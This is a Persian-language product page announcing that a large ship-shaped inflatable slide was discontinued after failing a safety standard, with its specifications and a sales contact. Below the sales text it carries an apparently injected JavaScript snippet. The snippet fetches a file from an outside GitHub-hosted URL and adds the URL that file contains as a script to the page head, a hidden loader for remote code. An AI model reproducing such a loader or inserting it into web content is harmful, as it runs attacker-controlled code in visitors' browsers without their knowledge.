سرسره بادی بزرگ کشتی از خط تولید خارج شد!

سرسره بادی بزرگ کشتی از خط تولید خارج شد!

 • سرسره بادی بزرگ کشتی (مشاهده) یکی از کاردستی های زیبای بادی سازان مجد (مجد سازه) از خط تولید خارج شد.

  مشخصات سرسره بادی

  ابعاد و اندازه

  این سرسره بادی دارای طول 10 متر و عرض 6.5 متر می باشد. همچنین ارتفاع این سرسره بادی به 9 متر می رسد که مناسب محیط های کوچک نیست. بنابرین شما می توانید از این قصر بادی در شهربازی های سرباز و محیط هایی با ارتفاع نسبتا بالاتر از 10 متر استفاده نمایید.

  لوازم جانبی

  این سرسره بادی یک سرسره دو سر است. بنابرین شما نیازمند دو عدد روکش سر و یک عدد پله می باشید. همچنین این قصر بادی بزرگ نیازمند یک عدد دمنده هوا (پمپ باد) 1 اسب می باشد.

  طرح و رنگ سرسره بادی بزرگ کشتی

  طرح این سرسره بادی ثابت و بدون چاپ می باشد. همچنین رنگ پارچه این قصر بادی ثابت بوده اما بر اساس میزان موجودی انبار طبقه بندی می شود که می توانید بر حسب سفارش خود آن را تغییر دهید.

  جنس پارچه و دوخت

  جنس پارچه این سرسره از پارچه با کیفیت کره ای تهیه شده و همچنین دوخت این سرسره بادی از نخ ترکیه ای توسط اساتید مجرب و تیم تولید با تجربه بادی سازان مجد دوخته می شود.

  علت خارج شدن از خط تولید

  این سرسره با تمام ویژگی های برجسته خود به علت نداشتن سکوی کافی برای ایستادن کاربران توسط استاندارد رد شد. به همین علت از خط تولید خارج گردید. اما نگران نباشید، شما می توانید جهت مشاهده دیگر محصولات و محصولات مشابه سرسره بادی بزرگ کشتی به فروشگاه ما سر بزنید. همچنین می توانید جهت مشاوره و خرید با شماره تلفن 09127484573 تماس تلفنی، و یا در شبکه های اجتماعی مانند تلگرام، ایتا، واتساپ، روبیکا و … با همین شماره تلفن تماس حاصل فرمایید. تیم پشتیبانی و فروش ما 24 ساعته جهت خدمات رسانی به مشتریان آماده هستند.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید